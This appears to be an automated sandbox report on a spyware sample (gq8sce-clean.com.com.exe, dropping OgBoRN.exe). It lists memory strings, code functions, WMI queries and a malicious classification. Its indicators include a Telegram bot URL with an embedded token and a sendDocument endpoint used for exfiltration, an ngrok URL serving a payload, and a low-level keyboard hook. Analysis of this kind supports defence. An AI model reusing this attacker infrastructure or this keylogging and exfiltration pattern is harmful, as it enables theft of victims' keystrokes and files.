              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4620180662.0000000006E01000.00000004.00000800.00020000.00000000.sdmp, gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2401382417.0000000007B01000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4629529277.0000000007951000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4620180662.0000000007241000.00000004.00000800.00020000.00000000.sdmp, gq8sce-clean.com.com.exe, 00000000.00000002.4620180662.0000000006ECB000.00000004.00000800.00020000.00000000.sdmp, gq8sce-clean.com.com.exe, 00000000.00000002.4620180662.000000000735F000.00000004.00000800.00020000.00000000.sdmp, gq8sce-clean.com.com.exe, 00000000.00000002.4620180662.00000000072FF000.00000004.00000800.00020000.00000000.sdmp, gq8sce-clean.com.com.exe, 00000000.00000002.4620180662.0000000007412000.00000004.00000800.00020000.00000000.sdmp, gq8sce-clean.com.com.exe, 00000000.00000002.4620180662.00000000070A2000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2401382417.0000000007EB4000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2401382417.0000000007D1F000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4629529277.0000000007B6C000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4629529277.0000000007E75000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4629529277.0000000007D2F000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4629529277.0000000007F13000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4629529277.0000000007D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4620180662.0000000006ECB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.orgH
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4620180662.0000000006ECB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.orgq/H
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://batch.chinacloudapi.cn/
              Source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.drString found in binary or memory: https://batch.chinacloudapi.cn/Jhttps://batch.core.usgovcloudapi.net/4https://batch.cloudapi.de/
              Source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.drString found in binary or memory: https://batch.core.windows.net/
              Source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.drString found in binary or memory: https://datalake.azure.net
              Source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.drString found in binary or memory: https://dc.services.visualstudio.com/v2/track
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dc.services.visualstudio.com/v2/trackVDequeueAndSend:
              Source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.drString found in binary or memory: https://graph.chinacloudapi.cn/4https://graph.cloudapi.de/$trafficmanager.net
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://graph.cloudapi.de/
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4620180662.0000000006E5E000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2401382417.0000000007B58000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4629529277.000000000799E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kvrcmhqc.ngrok.io
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4620180662.0000000006E5E000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2401382417.0000000007B58000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4629529277.000000000799E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kvrcmhqc.ngrok.io//Winhost.pif
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kvrcmhqc.ngrok.io//Winhost.pif5
              Source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.drString found in binary or memory: https://login.chinacloudapi.cn/Bhttps://login.microsoftonline.us/Bhttps://login.microsoftonline.de/4
              Source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.drString found in binary or memory: https://login.microsoftonline.com/
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://manage.microsoftazure.de/publishsettings/indexHhttps://management.core.cloudapi.de/Jhttps://
              Source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.drString found in binary or memory: https://manage.windowsazure.us
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://manage.windowsazure.us/publishsettings/indexThttps://management.core.usgovcloudapi.net/Jhttp
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://manage.windowsazure.usBhttps://login.microsoftonline.us/
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://management.core.windows.net(cloudServiceSettings
              Source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.drString found in binary or memory: https://management.core.windows.net/Rhttps://management.core.chinacloudapi.cn/Thttps://management.co
              Source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.drString found in binary or memory: https://vault.azure.cn
              Source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.drString found in binary or memory: https://vault.azure.net
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vault.azure.net4azuredatalakeanalytics.net
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vault.microsoftazure.de4https://batch.cloudapi.de/$Settings
              Source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.drString found in binary or memory: https://vault.microsoftazure.de6https://api.loganalytics.io
              Source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.drString found in binary or memory: https://vault.usgovcloudapi.net
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vault.usgovcloudapi.netJhttps://batch.core.usgovcloudapi.net/

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\gq8sce-clean.com.com.exe
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | Window created: window name: CLIPBRDWNDCLASS
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Window created: window name: CLIPBRDWNDCLASS
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_05CFBDE00_2_05CFBDE0
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_05CF75610_2_05CF7561
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_05CF67C00_2_05CF67C0
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_05CFC1B80_2_05CFC1B8
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_05CFA1B00_2_05CFA1B0
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_05CF61400_2_05CF6140
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_05CF992F0_2_05CF992F
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_05CFC9300_2_05CFC930
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_05CF61300_2_05CF6130
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_05CFAB880_2_05CFAB88
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_05CFEB570_2_05CFEB57
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_05CFB2A10_2_05CFB2A1
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_0955D9000_2_0955D900
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_095504900_2_09550490
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_09550B9F0_2_09550B9F
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_09550EC00_2_09550EC0
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_095504810_2_09550481
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_0213EA583_2_0213EA58
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_0213FC703_2_0213FC70
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_02130C4F3_2_02130C4F
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_02130C703_2_02130C70
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_05E5F4303_2_05E5F430
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065506F03_2_065506F0
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065500403_2_06550040
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_06558E503_2_06558E50
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_06556C793_2_06556C79
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_06550C303_2_06550C30
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_06553A873_2_06553A87
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065506E03_2_065506E0
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065570673_2_06557067
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065590943_2_06559094
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_06558E413_2_06558E41
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_06553F553_2_06553F55
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_06556FD83_2_06556FD8
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_06556FE13_2_06556FE1
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_06550C203_2_06550C20
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_06553ACE3_2_06553ACE
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_06557B093_2_06557B09
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065656103_2_06565610
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_0656D4203_2_0656D420
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_0656C4E03_2_0656C4E0
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065655FF3_2_065655FF
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065648B03_2_065648B0
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065D67C03_2_065D67C0
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065DA7883_2_065DA788
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065D9DA03_2_065D9DA0
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065DD2403_2_065DD240
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065D3B203_2_065D3B20
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065DD8D73_2_065DD8D7
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065DAE913_2_065DAE91
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065DA7793_2_065DA779
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065DF7C83_2_065DF7C8
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065D67B03_2_065D67B0
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065DFC203_2_065DFC20
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065D94B83_2_065D94B8
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065D75503_2_065D7550
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065D75603_2_065D7560
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065D95003_2_065D9500
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065D95303_2_065D9530
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065D95203_2_065D9520
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065DBDD83_2_065DBDD8
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065DCDA83_2_065DCDA8
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065DEB583_2_065DEB58
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065DEB483_2_065DEB48
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065D8BF03_2_065D8BF0
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065D83A43_2_065D83A4
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065D61383_2_065D6138
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065DC9283_2_065DC928
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065D612B3_2_065D612B
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065DC1B03_2_065DC1B0
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_0A180F603_2_0A180F60
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_0A1804483_2_0A180448
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_0A18D9983_2_0A18D998
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_0A180F513_2_0A180F51
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_0A18043B3_2_0A18043B
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_0241EA584_2_0241EA58
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_0241FC704_2_0241FC70
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_02410C4F4_2_02410C4F
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_02410C704_2_02410C70
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_05EFF4304_2_05EFF430
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066A06F04_2_066A06F0
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066A00404_2_066A0040
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066A0C304_2_066A0C30
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066A8C804_2_066A8C80
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066A3D074_2_066A3D07
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066A6AC94_2_066A6AC9
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066A06E04_2_066A06E0
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066A41D54_2_066A41D5
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066A6E284_2_066A6E28
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066A6E314_2_066A6E31
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066A8EC44_2_066A8EC4
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066A6EB74_2_066A6EB7
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066A8C704_2_066A8C70
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066A0C214_2_066A0C21
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066A3D4E4_2_066A3D4E
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066A79594_2_066A7959
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066F3F204_2_066F3F20
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066F67C04_2_066F67C0
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066FD2384_2_066FD238
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066F2AEA4_2_066F2AEA
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066FD8CF4_2_066FD8CF
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066FA1A04_2_066FA1A0
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066FEF604_2_066FEF60
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066FEF504_2_066FEF50
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066F8FF04_2_066F8FF0
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066F67B04_2_066F67B0
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066F84F84_2_066F84F8
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066F75604_2_066F7560
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066F75504_2_066F7550
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066FBDD04_2_066FBDD0
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066FCDA04_2_066FCDA0
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066FC5B84_2_066FC5B8
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066FB2914_2_066FB291
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066FAB794_2_066FAB79
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066FAB884_2_066FAB88
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066F98B84_2_066F98B8
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066F61214_2_066F6121
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066FC9204_2_066FC920
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066F99204_2_066F9920
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066F61304_2_066F6130
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066F99304_2_066F9930
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066FC1A84_2_066FC1A8
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_079356104_2_07935610
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_0793D4804_2_0793D480
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_079355FF4_2_079355FF
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_0793C5404_2_0793C540
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_079348B04_2_079348B0
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_0A0F0B604_2_0A0F0B60
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_0A0F00404_2_0A0F0040
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_0A0FD5A04_2_0A0FD5A0
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_0A0FFA904_2_0A0FFA90
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_0A0F0B514_2_0A0F0B51
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_0A0F001F4_2_0A0F001F
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4565689796.0000000001198000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs gq8sce-clean.com.com.exe
              Source: gq8sce-clean.com.com.exe, 00000000.00000000.2113428029.0000000001004000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamed39e31f8-6055-4385-86be-4d10b950f405.exe8 vs gq8sce-clean.com.com.exe
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4567833150.00000000016EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs gq8sce-clean.com.com.exe
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4571013968.0000000003491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs gq8sce-clean.com.com.exe
              Source: gq8sce-clean.com.com.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/2@4/4
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeFile created: C:\Users\user\AppData\Roaming\OgBoRNJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeMutant created: NULL
              Source: gq8sce-clean.com.com.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: gq8sce-clean.com.com.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
